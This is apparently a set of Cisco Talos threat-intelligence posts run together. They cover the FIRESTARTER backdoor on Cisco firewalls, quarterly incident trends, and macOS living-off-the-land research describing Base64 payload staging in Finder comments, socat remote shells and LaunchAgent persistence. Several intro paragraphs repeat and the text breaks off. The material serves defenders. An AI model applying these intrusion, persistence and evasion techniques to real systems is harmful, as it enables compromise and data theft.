Cisco Talos is aware of UAT-4356's continued active targeting of Cisco Firepower devices’ Firepower eXtensible Operating System (FXOS). UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed “FIRESTARTER.” FIRESTARTER considerably overlaps with the technical capabilities of RayInitiator’s Stage 3 shellcode that processes incoming XML-based payloads to endpoint APIs.
In early 2024, Cisco Talos attributed ArcaneDoor, a state-sponsored campaign focused on gaining access to network perimeter devices for espionage, to UAT-4356.
Customers are advised to refer to Cisco’s Security Advisory for mitigation and detection guidance, indicators of compromise (IOCs), affected products, and applicable software upgrade recommendations.
The FIRESTARTER backdoor
FIRESTARTER is a malicious backdoor implanted by UAT-4356 that allows remote access and control to execute arbitrary code inside the LINA process, a core component of Cisco’s ASA and FTD appliances running FXOS.
Persistence
UAT-4356 established persistence for FIRESTARTER on compromised devices by manipulating the mount list for Cisco Service Platform (CSP), namely “CSP_MOUNT_LIST”, to execute FIRESTARTER. The mount list allows programs and commands to be executed as part of the device’s boot sequence. The persistence mechanism triggers during graceful reboot (i.e., when a process termination signal is received). FIRESTARTER also checks the runlevel for value 6 (indicating device reboot) and in case of a match, writes itself to backup location “/opt/cisco/platform/logs/var/log/svc_samcore.log" and updates the CSP_MOUNT_LIST to copy itself back to “/usr/bin/lina_cs” and then be executed. When FIRESTARTER runs after a reboot, it restores the original CSP_MOUNT_LIST and removes the trojanized copy. Because the runlevel triggers establishment of this transient persistence mechanism, a hard reboot (for example, after the device has been unplugged from power) effectively removes the implant from the device.
FIRESTARTER has used the following commands to establish persistence for itself using the transient persistence mechanism:
When the implant injects itself into the LINA process, it removes the traces of its persistence mechanism by restoring the CSP_MOUNT_LIST from a temporary copy (“CSP_MOUNTLIST.tmp”), then removing the temporary copy and the FIRESTARTER file from disk (“/usr/bin/lina_cs”).
FIRESTARTER’s backdoor capabilities
FIRESTARTER can run arbitrary shellcode received by the device. A pre-defined handler function specified by a hardcoded offset in the LINA process’ memory is replaced by an unauthorized handler routine that parses the data being served to it. FIRESTARTER specifically looks for a WebVPN request XML. If the request data received matches a specific pattern of custom-defined prefixing then the shellcode that immediately follows it is executed in memory. If the prefixing bytes are not found, then the data is treated as regular request data and passed to the original handler function (if any).
FIRESTARTER’s loading mechanism, Stage 2 shellcode (i.e., the actual request handler component), handler function replacement, XML parsing for magic bytes, and final payload execution display considerable overlaps with RayInitiator’s Stage 3 deployment actions and accompanying artifacts.
Injecting and activating the malicious shellcode in LINA
FIRESTARTER first reads the LINA process’ memory to search for and verify the presence of the bytes (long) 0x1, 0x2, 0x3, 0x4, 0x5 at specific locations in memory. If found, FIRESTARTER will then query the process’ memory to find an “r-xp” memory range for the shared library “libstdc++.so”. It then copies the next stage shellcode (Stage 2) to the last 0x200 bytes of the memory region. FIRESTARTER then overwrites an internal data structure in the LINA process’ memory to replace a pointer to a WebVPN-specific, legitimate XML handler function with the address of the malicious Stage 2 shellcode.
The malicious shellcode is triggered as part of the authentication API’s request handling process and parses the incoming request data for magic markers signifying an executable payload. If found, the executable payload is then executed on the compromised device.
Detection guidance
The presence of the following artifacts - specifically the filenames “lina_cs” and “svc_samcore.log” - though somewhat brittle indicators, may indicate the presence of the FIRESTARTER on a Firepower device:
We recommend that Cisco customers follow the steps recommended in Cisco's advisory, with particular attention to any applicable software upgrade recommendations. Organizations impacted can initiate a TAC request for Cisco support.
A FIRESTARTER infection may be mitigated on all affected devices by reimaging the devices.
On Cisco FTD software that is not in lockdown mode, there is also the option of killing the lina_cs process then reloading the device:
Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where initial access could be determined. Phishing has not been the top vector for initial access since Q2 2025.Public administration and health care tied as the most targeted industry verticals, each accounting for 24 percent of all engagements. This is the third consecutive quarter where public administration has been the most targeted industry vertical. Pre-ransomware incid
Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where initial access could be determined. Phishing has not been the top vector for initial access since Q2 2025.
Public administration and health care tied as the most targeted industry verticals, each accounting for 24 percent of all engagements. This is the third consecutive quarter where public administration has been the most targeted industry vertical.
Pre-ransomware incidents made up just 18 percent of engagements this quarter, and we did not observe any ransomware deployment due to early and swift mitigation from Cisco Talos Incident Response (Talos IR). This is a slight increase from last quarter but overall very low compared to Q1 and Q2 2025, when we observed ransomware in 50 percent of engagements.
Watch this video to see Talos experts break down the trends and offer guidance for defenders.
AI tool leveraged in phishing campaign
Talos IR responded to a campaign that leveraged phishing, the most common means of initial access this quarter, to compromise the most targeted industry vertical this quarter: public administration. Notably, the actors leveraged the Softr AI-based web application development service, marking the first time we have documented the use of a specific AI tool by an adversary in a phishing campaign. Softr was used to generate a credential harvesting page targeting users’ Microsoft Exchange and Outlook Web Access (OWA) accounts.
State-sponsored and criminal actors have been observed abusing large language models (LLMs) to aid in the development of phishing lures, malicious scripts, and other tasks. DDoS-as-a-service actors have adopted AI algorithms for defense evasion and attack orchestration. While this is the first time we have documented the use of a specific AI tool in a Talos IR incident, we have moderate confidence that malicious actors have used Softr’s AI-powered web application creation platform since at May 2023, based on Cisco Umbrella data and other telemetry, and have done so with increasing frequency to date.
This incident demonstrates how AI tools can lower the barrier to entry for less sophisticated actors and/or accelerate the speed of phishing and credential-harvesting campaigns. Using a form template and the “vibe coding” feature, a phishing page like the one used in this attack could be quickly created with a few AI prompts and no code. Phishing pages built with Softr can direct data to a disposable external data store, such as Google Sheets, and send alerts for new captures via email — all without code.
Crimson Collective seen for the first time
Talos IR experienced its first case involving Crimson Collective, a cyber extortion group that appeared in September 2025. This attack highlighted the use of valid accounts for initial access, the second most commonly observed means of initial access this quarter. This attack also notably involved targeting exploit weaknesses, the second-most observed security weakness, accounting for 25 percent of all engagements. We attribute this activity to Crimson Collective based on IPs associated with the group that were used to scan the victim's ASA firewalls, as well as an overlap of observed tactics and techniques with publicly reported Crimson Collective attacks.
The incident began when a GitHub Personal Access Token (PAT) was inadvertently published on a public-facing website, exposing the organization to adversaries for several months. Upon obtaining access, the adversary used TruffleHog, an open-source tool commonly utilized by security professionals, to scan thousands of victim GitHub repositories for additional secrets and sensitive information. This approach allows attackers to perform reconnaissance without triggering suspicion, as they are leveraging standard, legitimate tools. The attacker’s discovery of client secrets through TruffleHog enabled further access to the victim’s Azure cloud storage, where they used Microsoft Graph API calls to authenticate, explore, and exfiltrate data. The abuse of legitimate cloud APIs demonstrates a growing trend where threat actors use native platform functionality to blend into normal user activity, making detection more challenging.
In addition to exfiltrating data, the adversary attempted to inject malicious code into multiple GitHub repositories. This code was designed to harvest any new secrets committed in the future, sending them to adversary-controlled infrastructure. Though these attempts were largely thwarted by the expiration of targeted secrets and effective security controls, the tactic reflects an emerging trend of supply chain and development environment attacks.
Pre-ransomware incidents made up just 18 percent of engagements this quarter, and we did not observe any ransomware encryption due to early and swift mitigation from Talos IR. This is a slight increase from last quarter, when ransomware and pre-ransomware collectively comprised 13 percent of engagements, but overall very low compared to Q1 and Q2 2025, when we observed ransomware in 50 percent of engagements. Attribution is challenging in pre-ransomware events because there are no encryptors or ransom notes, but we assess that Rhysida ransomware and MoneyMessage ransomware accounted for two of the engagements.
While we did not observe many active and prolific ransomware-as-a-service (RaaS) operations, like Qilin or Akira, this likely does not indicate these major players are decreasing operations, as their data leak sites remain consistently active.
Rhysida ransomware actors use uncommon backdoor, Meowbackconn
Talos IR responded to a ransomware incident where the adversary attempted to deploy Rhysida ransomware. While the attack was mitigated in the pre-ransomware stage, we attribute this activity with moderate confidence to Rhysidabased on observed infrastructure that is associated with Rhysida activity and the use of Gootloader, which is commonly leveraged in Rhysida attacks during initial access. Notably, the actors deployed proxy-related DLLs (e.g., “meow_eu.dll”), which we assess were likely related to MeowBackConn, an uncommon backdoor that is closely associated with Gootloader, based on public reporting.
This attack represents several trends that we observed throughout Talos IR engagements in Q1 2026. The environmental weaknesses that enabled this intrusion — exposed WinRM management ports, over-privileged service accounts, and critical logging gaps — directly echo this quarter’s most prominent security weaknesses, including vulnerable or exposed infrastructure, accounting for 25 percent of engagements. Furthermore, the adversary’s use of Remote Desktop Protocol (RDP) for lateral movement is consistent with RDP being the top technique for lateral movement for the previous two quarters (Q3 and Q4 2025).
Targeting
Public administration and health care were tied as the most targeted industry verticals. Notably, Q3 2025 marked the first time public administration emerged as the most targeted sector in Talos IR engagements, and it has retained that position since. Organizations within the public administration sector are attractive targets as they are often underfunded and use legacy equipment. These entities may have access to sensitive data as well as a low downtime tolerance, making them attractive to financially motivated and espionage-focused threat groups.
Initial access
Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where initial access could be determined. Phishing was the top initial access vector in the first half of 2025, at which point it was surpassed by exploitation of public-facing applications, likely due to the widespread exploitation of vulnerabilities in on-premises Microsoft SharePoint servers, collectively referred to as ToolShell. Since then, we have observeda steady decrease in the exploitation of public-facing applications as an initial access vector from a high of 62 percent to only 18 percent in Q1 2026. Similarly, in this quarter, valid accounts returned to its pre-ToolShell baseline as the second most observed means of gaining initial access, comprising 24 percent of Talos IR engagements. We assess the decline in ToolShell exploitation is likely due to the widespread availability of emergency patches and enhanced security detections, highlighting the importance of timely patching.
Recommendations for addressing top security weaknesses
Implement properly configured MFA and other access control solutions
35 percent of engagements this quarter involved multi-factor authentication (MFA) weaknesses, an increase from last quarter. This includes incidents where threat actors bypassed MFA and where MFA was either missing or only partially enabled, particularly on remote access services. Adversaries were able to bypass MFA by registering new devices to previously compromised accounts, and in one instance, by configuring Outlook clients to connect directly to Exchange servers, circumventing MFA requirements. Addressing these weaknesses, especially by restricting self-service MFA enrollment and enforcing strong, centralized authentication policies, is essential to reducing risk and strengthening organizational resilience.
Conduct robust patch management
Vulnerable or exposed infrastructure was another top security weakness accounting for 25 percent of all engagements, a slight decrease from last quarter. This included exploiting a vulnerability (CVE-2025-20393) in the Spam Quarantine feature of Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager, as well as a vulnerability (CVE-2023-20198) in the web UI feature in Cisco IOS XE Software. Talos also observed exposed management ports (such as WinRM open to the internet), which enabled rapid attacker movement and reconnaissance.
Configure centralized logging capabilities across the environment
Finally, 18 percent of engagements this quarter involved organizations with insufficient logging capabilities, which hindered investigative efforts. Understanding the full context and chain of events performed by an adversary on a targeted host is vital not only for remediation but also for enhancing defenses and addressing any system vulnerabilities for the future. To address this issue, Talos IR recommends organizations implement a security information and event management (SIEM) solution for centralized logging. In the event an adversary deletes or modifies logs on the host, the SIEM will contain the original logs to support a forensics investigation. Additionally, Talos IR offers a Log Architecture Assessment service, which provides a focused review of an organization’s logs and overall log strategy to identify gaps and offer recommendations that give a complete view of the security environment and strengthen incident response readiness
MITRE ATT&CK appendix
The tables below represent the MITRE ATT&CK techniques observed in this quarter’s IR engagements and includes relevant examples and the number of times seen. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic based on the way they were leveraged. Please note that this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
Phishing was the top method of initial access, replacing exploitation of public-facing applications which was dominant in the prior two quarters.
Web-based C2 was the most common C2 pattern. Application Layer Protocol over web protocols was observed most often, indicating adversaries frequently blended C2 into normal-looking traffic.
Lateral movement primarily relied on common remote administration channels. SMB/Windows Admin Shares was the top lateral movement technique, with WMI and RDP also heavily used, suggesting attackers repeatedly leveragedstandard enterprise remote management paths once inside. RDP was the top technique for lateral movement in the prior two quarters.
Defense evasion frequently focused on weakening visibility and endpoint protections. Impair defenses by disabling/modifying tools appeared multiple times, alongside log/trace reduction behaviors (e.g., clear command history and file deletion), indicating a recurring emphasis on reducing detection and forensic evidence.
The adversaryenumeratedinternal processes andidentifiedvendor emails tofacilitatetheir fraudulent ordering scheme.
1
T1595: Active Scanning
The adversary scanned public-facing websites to understand the target environment.
2
T1593: Search Open Websites/Domains
The adversary scanned the web to obtainGithubPATs.
1
Initial access
T1566: Phishing
The adversary used malicious emails and social engineering to compromise user accounts andfacilitatefraudulent purchase orders.
5
T1189: Drive-by compromise
The adversary registered several domains that masquerade as being related to VMware, and manipulated the SEO to show them at the top when searching for keywords such as VMware
3
T1078: Valid Accounts
The adversary successfully gained access to the environment by using compromised user credentials
4
T1190: Exploit public-facing applications
Two internet facing Linux servers running Apache and an LMS application were targeted.
3
Execution
T1204.002: User Execution: Malicious File
The victim downloaded a malicious installer on their personal host, connected the host to their company’s network, transferred the malware to their primary domain controller, then executed the malware.
3
T1204.001: User Execution: Malicious link
The victim clicked on a link that led to a fakeDocuSigndocument hosted on adobe[.]com
5
T1059.001: Command and Scripting Interpreter: PowerShell
The adversary used PowerShell commands and scripts for execution.
4
T1059.006: Command and Scripting Interpreter: Python
The adversary used automated Python scripts to interact with the environment.
1
T1059.005: Command and Scripting Interpreter: MSHTA
The adversaryattemptedto use mshta.exe to retrieve and execute a remote malicious payload from an external URL.
The adversary registered their own malicious MFA devices tomaintainaccess to compromised accounts.
2
T1219: Remote Access Software
The adversary installed and usedAnyDeskfor unauthorized remote access.
1
T1053.005: Scheduled Task/Job: Scheduled Task
The adversary configured tasks to run on a schedule or at system startup.
1
T1505: Server Software Component
The adversary installed malware on breached devices tofacilitateremote command execution via HTTP.
1
Privilege escalation
T1068: Exploitation for Privilege Escalation
The adversary escalated to SYSTEM level privileges, which may have provided access to cached credentials in memory or registry hive.
1
T1548: Abuse Elevation Control Mechanism
The adversary usedExecutionPolicyBypass in PowerShell andattemptedto add users to the local Administrators group.
1
T1078Valid Accounts
The adversary bypassed standard access controls by using compromised accounts with existing high-level privileges.
1
Defense evasion
T1070.003: Indicator Removal on Host: Clear Command History
The adversary used the terminal emulator "ConEmu" to run commands, intentionally avoiding log generation.
2
T1070.001: Indicator Removal: Clear Windows Event Logs
The adversarydeletedlogs on compromised devices to limit forensic findings.
1
T1556:ModifyAuthentication Process
The adversary set up an OutlookclientOutlook client to connect to the Exchange Server and was able to send messages via that path which bypasses the requirement for MFA via Duo.
1
T1562.001: Impair Defenses: Disable or Modify Tools
The adversary was able to uninstall EDR agents from hosts andattemptedto delete Windows Defender policies.
4
Credential access
T1003.002: OS Credential Dumping: Security Account Manager
The adversary saved SAM and SYSTEM registry hives to extract local account hashes.
2
T1003.003: OS Credential Dumping: NTDS
The adversary dumped thentds.ditfile from Domain Controllers to obtain domain-wide credential hashes.
1
T1003.005: Cached Domain Credentials
The adversary gained NT hashes for multiple domain accounts from cached logon information.
1
T1557: Adversary-in-the-Middle
Theadversary usedanAiTMproxy to capture credentials and session tokens.
1
Discovery
T1087.003: Account Discovery: Email Account
The adversary used Graph API calls to verify long lists of email addresses and retrieve associated user GUIDs.
1
T1580: Cloud Infrastructure Discovery
The adversary performed enumeration of the environment, including gathering OneDrive metadata (drive IDs and child item counts) and user roles.
1
T1069.002: Permission Groups Discovery: Domain Groups
The adversary used commands like net group "domain admins" /domain to find high-privilege accounts.
1
T1526: Cloud Service Discovery
The adversary ran the legitimate cybersecurity toolTruffleHogto discover repositoriescontainingclient secrets and personal information.
The analysis of M365 Audit Logs showed multipleFileAccessedand FileDownloaded events for documents stored in SharePoint and OneDrive.
1
T1040 Network Sniffing
The adversary executed monitor capture commands on specific interfaces to intercept and capture network traffic.
1
Command and control
T1071.001: Application Layer Protocol: Web Protocols
The adversary usedMeshAgentto communicate with the C2 server overWebSockets.
5
T1102: Web Service
The adversaryleverageda Telegram URL to issue instructions and download links.
1
T1572: Protocol Tunneling
The adversary used a second-stage script to create an HTTPS tunnel directly to the C2 system.
1
T1201: Traffic Signaling
The adversary communicated with external infrastructure using regular beaconing or other signaling patterns to maintain C2 or check in with their C2 server.
1
Exfiltration
T1567.002: Exfiltration Over Web Service
The adversary accessed and exfiltrated internal data, specifically SharePoint files, via web-based channels.
1
T1041: Exfiltration Over C2 Channel
The adversary exfiltrated approximately 2,500 client secrets and personal information.
2
Impact
T1657: Financial Theft
The adversary used company resources to place orders totaling hundreds of thousands of US dollars for various products which were successfully delivered.
1
T1486 Data Encrypted for Impact
The adversary encrypted victim data.
1
T1531 Account Access Removal
The adversary disabled admin accounts and deleted service accounts in the Active Directory (AD) and Azure
1
Software
Rhysida
A RaaS, known for posing as a cybersecurity team that “helps” its victimsidentifysecurity weaknesses in their networks.
Pre-ransomware engagement
SocGholish
A JavaScript-based loader malware that has been usedsince at least2017, primarily forinitialaccess.
1
Money Message
A ransomware that emerged inMarch 2023, andis capable of targeting Windows and Linux systems (including VMwareESXiservers).
In this episode, we unpack state-sponsored and phishing trends from the 2025 Talos Year in Review. Amy and Martin Lee explore the alarming rise of internal phishing campaigns that bypass traditional perimeter defenses, including the widespread weaponization of Microsoft 365's Direct Send feature. Beyond simple phishing, we analyze the aggressive, blended operations of state-sponsored actors from China and North Korea who are combining high-level zero-day exploits with sophisticated social engine
In this episode, we unpack state-sponsored and phishing trends from the 2025 Talos Year in Review. Amy and Martin Lee explore the alarming rise of internal phishing campaigns that bypass traditional perimeter defenses, including the widespread weaponization of Microsoft 365's Direct Send feature. Beyond simple phishing, we analyze the aggressive, blended operations of state-sponsored actors from China and North Korea who are combining high-level zero-day exploits with sophisticated social engineering. From the "Dear Leader" interview test to the reality of fake developer personas, we break down exactly how these adversaries are infiltrating modern organizations.
In 2025, attackers increasingly targeted weaknesses in multi-factor authentication (MFA) workflows, and phishing attacks leveraged valid, compromised credentials to launch lures from trusted accounts. The trends focused entirely on trust, or the lack thereof, in everyday business operations.PhishingIn 2025, phishing attacks were used for initial access in 40% of incidents, maintaining their prevalence. Attackers ramped up cascaded phishing campaigns, where attackers leveraged the trust of the in
In 2025, attackers increasingly targeted weaknesses in multi-factor authentication (MFA) workflows, and phishing attacks leveraged valid, compromised credentials to launch lures from trusted accounts. The trends focused entirely on trust, or the lack thereof, in everyday business operations.
Phishing
In 2025, phishing attacks were used for initial access in 40% of incidents, maintaining their prevalence. Attackers ramped up cascaded phishing campaigns, where attackers leveraged the trust of the initial compromised account to create specialized phishing attempts, within the network and out of it, aimed at trusted partners and third parties.
Email composition trends
The content of phishing emails changed somewhat. Transitioning away from spam offers, they took the form of workflow-style emails — IT, travel, and other everyday business tasks that look familiar to employees and executives. Travel and logistics lures in particular surged, while political lures dropped off. Internal expensing and travel emails, even when legitimate, are often repetitive and come from disparate sources with changeable formats or poorly-rendered templates, leading to a lowered guard toward spotting malicious intent. Attackers were likely aiming to steal credentials, payment information, or MFA tokens via fake single sign-on (SSO) pages.
In reviews of thousands of blocked-email keywords, 60% contained subject lines with "request," "invoice," "fwd," "report," and similar. IT-focused phishing keywords turned more technical, to words like "tampering," "domain," "configuration," "token," and others, showing that attackers were making plays toward IT and security workflows.
Attackers also abused Microsoft 365 Direct Send to capitalize on internal email trust. Direct Send is the method by which networked devices like printers and scanners deliver documents to users. The messages appear to be sent and received by the same email address. These internal messages do not receive the same scrutiny that external emails do, from employees or automated email filters. Direct Send allowed attackers to spoof internal email addresses and deliver highly convincing lures from inside the organization, without compromising real accounts, to target key attack services and deliver high-impact damage.
MFA and identity attacks
Identity and access management (IAM) applications have grown popular with organizations hoping to consolidate user privileges. Unfortunately, it has also grown in popularity with attackers. Nearly a third of 2025 MFA spray attacks targeted IAM, turning the tools companies used to maintain access control into a point of failure. Device compromise surged by 178%, largely driven by voice phishing designed to trick administrators into registering malicious devices.
MFA spray and device compromise
MFA attack strategy changed by sector. A successful attack could glean SSO tokens and give adversaries the ability to change user roles and credentials, or even the MFA policies themselves. Attackers increasingly exploited authentication workflows to gain and maintain access.
Spray attacks were deployed against networks with predictable identity behavior, while diverse, unmanaged, or high-turnover device ecosystems proved weaker to device compromise attacks.
Notably, higher education was the most targeted device compromise sector. Several factors could contribute to the trend:
· Large, public-facing directories for targeted phishing
Higher education was a very unfavorable target for MFA spray attacks, however. Passwords and MFA are also highly varied and segmented, and most universities have strong login portal policies, enforced lockouts, and login attempt limits.
Guidance for defenders
As always, prioritize based on your own environment.
Organizations should keep in mind that living-off-the-land binaries (LOLBins) and open-source and dual-use tools, which are not inherently malicious, are key to further exploitation. Blocking external IPs from using a feature, enabling Microsoft’s newer “Reject Direct Send” control, tightening SPF/DMARC enforcement, and treating “internal-looking” emails with the same scrutiny as inbound mail are currently the most effective defenses.
Likewise, MFA attack protection should be tailored to the style of environment and sector.
MFA spray attacks work well on stable, scaled identity controls. Counter these attacks with strong lockout policies, good password hygiene, and conditional access.
Device compromise works best on variable networks where devices change over fast and MFA use is spotty. Work on establishing better device hardening and management, session controls, and strict phishing-resistant MFA with enrollment governance. Solutions such as Cisco Duo provide controls for phishing-resistant MFA, device trust, and secure enrollment, helping reduce risk from phishing and identity-based attacks.
This blog only scratched the surface on 2025 threat trends. See the full Year in Review report for a detailed explanation of Microsoft 365 Direct Send and how it was used for attacks, infographic breakdowns of MFA spray vs. device compromise attacks, the full list of targeted tools and sectors by percentage, and more.
As macOS adoption grows among developers and DevOps, it has become a high value target; however, native "living-off-the-land" (LOTL) techniques for the platform remain significantly under-documented compared to Windows. Adversaries can bypass security controls by repurposing native features like Remote Application Scripting (RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis. Attackers can move toolkits and estab
As macOS adoption grows among developers and DevOps, it has become a high value target; however, native "living-off-the-land" (LOTL) techniques for the platform remain significantly under-documented compared to Windows.
Adversaries can bypass security controls by repurposing native features like Remote Application Scripting (RAS) for remote execution and abusing Spotlight metadata (Finder comments) to stage payloads in a way that evades static file analysis.
Attackers can move toolkits and establish persistence using built-in protocols such as SMB, Netcat, Git, TFTP, and SNMP operating entirely outside the visibility of standard SSH-based telemetry.
Defenders should shift from static file scanning to monitoring process lineage, inter-process communication (IPC) anomalies, and enforcing strict MDM policies to disable unnecessary administrative services.
As macOS adoption in the enterprise reaches record highs, with over 45 percent of organizations now utilizing the platform, the traditional "security through obscurity" narrative surrounding the OS has been rendered obsolete. Mac endpoints, once relegated to creative departments, are now the primary workstations for developers, DevOps engineers, and system administrators. Consequently, these machines have become high-value targets that serve as gateways to source code repositories, cloud infrastructure, and sensitive production credentials.
Despite this shift, macOS-native lateral movement and execution tradecraft remain significantly understudied compared to their Windows counterparts. This research was conducted to address this critical knowledge gap. Through a systematic validation of native macOS protocols and system binaries, it is demonstrated how adversaries can “live off the land” (LOTL) by repurposing legitimate administrative tools. By weaponizing native primitives, such as Remote Application Scripting (RAS) and Spotlight metadata, intentional OS security features can be bypassed to transform standard system functions into robust mechanisms for arbitrary code execution and fleet-wide orchestration.
macOS is no longer a niche operating system. According to the Stack Overflow 2024 Developer Survey, a third of professional developers use macOS as their primary platform. These machines represent high-value pivot points, often holding source code repositories, cloud credentials, and SSH keys to production infrastructure.
Despite this trend, the MITRE ATT&CK framework documents far fewer techniques for macOS than for Windows, and recent industry reports indicate that macOS environments prevent significantly fewer attacks than their Windows or Linux counterparts. To address this disparity, community-driven resources such as LOOBins (living-off-the-orchard binaries) have emerged to catalog native macOS binaries that can be repurposed for malicious activity. This research aims to further close that gap by systematically enumerating the native pathways available for both movement and execution.
Establishing a remote shell is the first step in any post-exploitation chain. While SSH is the standard, native macOS features provide several alternatives that can bypass traditional monitoring.
Remote Application Scripting as a Software Deployment Tool (T1072)
Remote Application Scripting (RAS, formerly known as Remote Apple Events or RAE) was introduced to extend the capabilities of the AppleScript Inter-Process Communication (IPC) framework across a network. By utilizing the Electronic Program-to-Program Communication (“eppc”) protocol, administrative tasks and application automation can be performed on remote macOS systems. This mechanism allows a controller machine to send high-level commands to a target machine, which are then processed by the “AppleEventsD” daemon.
The Open Scripting Architecture (OSA) is utilized as the standardized framework for this inter-application communication and automation on macOS. Through the exchange of Apple Events, this architecture enables scripts to programmatically interact with the operating system and installed applications, providing the functional foundation for the “osascript” utility.
Traditionally, RAS is viewed as a lateral movement vector; however, this research demonstrates that it can also be utilized as a standalone Software Deployment Tool for Execution (T1072).
Adversaries attempting to use RAS for complex payloads often encounter Apple’s intentional security features, specifically the -10016 Handler Error. This restriction prevents the “System Events” application from executing remote shell commands via do shell script, even when RAS is globally enabled.
Figure 2. The -10016 Handler Error in remote application scripting.
To bypass this, a methodology was developed that treats “Terminal.app” as an execution proxy. Unlike “System Events”, “Terminal.app” is designed for shell interaction and accepts remote “do script” commands. To ensure payload integrity and bypass AppleScript parsing limitations (such as the -2741 syntax error), Base64 transport encoding is utilized. This transforms multi-line scripts into flat, alphanumeric strings that are decoded and executed in a two-stage process:
Deployment: A single RAS command instructs the remote “Terminal.app” to decode the Base64 string into a temporary path and apply chmod +x.
Invocation: A second RAS command explicitly invokes the script via "bash”, ensuring a proper shell context.
Figure 3. Terminal.app as an execution proxy for Base64 payloads.
Remote Application Scripting for Lateral Movement (T1021.005)
While RAS can be weaponized for execution, its primary function remains the facilitation of inter-process communication (IPC) across a network. In a lateral movement context, RAS is utilized to control remote applications by targeting the “eppc://” URI. This allows for the remote manipulation of the file system or the retrieval of sensitive environmental data without the need for a traditional interactive shell.
For example, the command in Figure 4 can be used to remotely query the Finder for a list of mounted volumes on a target machine, providing an adversary with immediate insight into the victim's network shares and external storage:
Figure 4. Remotely querying mounted volumes via RAE.
Because these actions are performed via Apple Events rather than standard shell commands, they often bypass security telemetry that focuses exclusively on process execution trees, making RAS a discreet and effective vector for lateral movement.
AppleScript execution via SSH
AppleScript is macOS's built-in scripting language for automation. While RAS is a viable application control mechanism, Apple security controls prevent RAS from launching applications; they must already be running. Additionally, RAS must be enabled on the target. To circumvent these obstacles, osascript can be invoked directly over SSH.
Passing osascript the system info command over SSH returns critical environmental details:
Figure 5. Retrieving system information via osascript over SSH.
For arbitrary command execution, AppleScript's do shell script handler can be invoked over SSH. In the following example, do shell script is used to write a file to the target:
Figure 6. Arbitrary file creation using do shell script over SSH.
While SSH alone can accomplish shell tasks, osascript provides access to graphical user interfact (GUI) automation and Finder manipulation through Apple Events IPC rather than spawning shell processes. This creates a significant telemetry gap, as most endpoint detection tooling has less visibility into IPC-driven actions than standard shell process trees.
socat remote shell
socat (SOcket CAT) is a command line utility for establishing bidirectional data streams between two endpoints. It supports a wide range of socket types including TCP, UDP, Unix domain sockets, and pseudo terminals (pty).
In a lateral movement context, socat can establish an interactive shell on a target without relying on SSH. The target runs a listener that binds a login shell to a TCP port with pty allocation, and the attacker connects to it from a remote machine.
On the target, the listener spawns an interactive bash session for each incoming connection with pty forwarding:
Figure 7. Establishing a listener with PTY forwarding on the target.
From the attacking machine, connecting to the listener provides a fully interactive terminal:
Figure 8. Attacker connection to the socat listener.
On the target, the reuseaddr,fork options allow multiple connections and reuse of the port, while pty,stderr on the exec gives the connecting client a proper terminal with stderr output. On the sender side, raw,echo=0,icanon=0 puts the local terminal into raw mode so that control characters and signals pass through to the remote shell correctly.
SSH is the de facto mechanism for gaining remote shell access on remote hosts, and as a result, it is where most detection engineering efforts are focused. socat achieves the same outcome, fully interactive terminal access, but operatesentirely outside the SSH ecosystem. There are no sshd logs, PAM authentication events, or “authorized_keys” to manage, which means detection pipelines built around SSH telemetry would not catch this activity.
Covert data transfer: Finder metadata abuse
A notable constraint of RAS is its inability to write file contents directly. To work around this, we can abuse the Finder Comment (“kMDItemFinderComment”) field, which is stored as Spotlight metadata.
Writing payloads to Finder Comments
A notable constraint of RAS is its inability to write file contents directly. To circumvent this, threat actors can abuse the Finder Comment field (“kMDItemFinderComment”) — a component of Spotlight metadata stored as an extended attribute. By storing a payload within metadata rather than the file's data fork, they can bypass traditional file-based security scanners and static analysis tools, which typically focus on executable code and script contents.
Because Finder is scriptable over RAS, the comment of a file on a remote machine can be set via the “eppc://” protocol. By Base64 encoding a payload locally, a multi-line script can be stored within this single string field. The make new file command handles the creation of the target file, ensuring that no pre-existing file is required:
Figure 9. Setting Finder comments via RAE for payload staging.
The payload resides entirely within the Spotlight metadata, a location that remains largely unexamined by standard endpoint detection and response (EDR) solutions. This creates a stealthy staging area where malicious code can persist on the disk without triggering alerts associated with suspicious file contents.
Extraction and execution
On the target, extraction and execution is a single line. mdls reads the comment, base64 -D decodes it, and the result is piped to “bash”:
Figure 10. Extraction and execution of metadata-stored payloads.
Persistence via LaunchAgent
This approach can be paired with a LaunchAgent for persistence. A plist in “~/Library/LaunchAgents” that executes the extraction chain at user login allows the payload to run automatically.
Our initial attempt using mdls inside the LaunchAgent failed because Spotlight may not be fully initialized when LaunchAgents fire. The fix was to replace mdls with osascript calling Finder directly to read the comment:
Figure 11. Persistence via LaunchAgent and Finder metadata.
Talos confirmed this successfully executes the payload at login. It is worth noting that macOS prompts the user to approve the bash execution at login, which is a visible indicator of background activity. The plist contains no payload, only a reference to metadata, so static analysis of the LaunchAgent would not reveal the malicious content.
Lateral Tool Transfer techniques
Once attackers achieve execution, they must move their toolkit across the environment. Several native protocols were validated for tool transfer (T1570).
Standard protocols: SCP and SFTP
SCP (Secure Copy Protocol) and SFTP (SSH File Transfer Protocol) are the most straightforward methods, operating over SSH and available out-of-the-box on any macOS system with Remote Login enabled.
Figure 12. SCP file transfer syntax.Figure 13. SFTP file transfer syntax.
SMB-based transfer
Server Message Block (SMB) is a network file sharing protocol commonly associated with Windows environments, but macOS includes native support for both SMB client and server functionality. In a lateral movement context, an attacker can mount a remote SMB share and access its contents as if they were local files.
This method of setting up an SMB share on the victim requires SSH access. The following command creates a shared directory, loads the SMB daemon, and creates the share.
Figure 14. Configuring a native SMB share on macOS.
With the share created, the next step is mounting it from the attacker machine. Attempting this action with the mount command failed due to an authentication error.
Figure 15. Authentication error encountered during SMB mount.
To resolve this issue, GUI access to the victim machine was required. On the victim machine, navigate to System Settings > General > Sharing > File Sharing > Options. Located here is the option to store the user's account password on the computer. Even though this is labeled as "Windows File Sharing", it was required to properly authenticate the user when using the mount utility.
However, this entire GUI dependency can be avoided by using osascript to mount the share instead of mount:
